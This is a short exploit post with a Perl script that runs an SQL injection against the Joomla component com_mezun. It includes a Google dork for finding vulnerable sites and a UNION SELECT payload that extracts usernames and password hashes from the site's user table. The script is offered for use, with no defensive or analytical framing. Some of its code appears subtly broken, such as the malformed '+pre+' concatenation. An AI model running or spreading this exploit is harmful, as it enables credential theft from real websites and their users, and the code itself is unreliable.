Joomla Component Remote Exploit Method

1. Dorks: inurl:index.php?option=com_mezun
2.  
3. exploit:
4.  
5. #!/usr/bin/perl
6. #Exploit title: Joomla Component com_mezun SQL Injection exploit
7. #Google Dork: inurl:index.php?option=com_mezun
8. #Exploit Author: CoderSec.
9.  
10. system("color a");
11.  
12.  
13.  
14.  
15. print "*********************************************\n";
16. print "* Joomla Component com_mezun *\n";
17. print "* SQL Injection *\n";
18. print "* Coded by KYFX *\n";
19. print "*********************************************\n";
20. sleep 1;
21. use LWP::UserAgent;
22. print "Enter the target --> ";
23. chomp(my $target=<STDIN>);
24. $code="/**/union/**/select/**/concat(username,0x3a,password),username,password,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a/**/from/**/"+pre+"_users/;";
25. $agent = LWP::UserAgent->new() or die "[!] Error while processing";
26. $agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
27. $host= $target. "/index.php?option=com_mezun&task=edit&hidemainmenu=joomla&id=-9999999==".$code;
28. $ok = $agent->request(HTTP::Request->new(GET=>$host));
29. $ok1 = $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
30. print "[+] Password found --> $1\n$2\n";
31.  
32. sleep 1;
33. }
34. else
35. {
36. print "Password not found \n";
37. }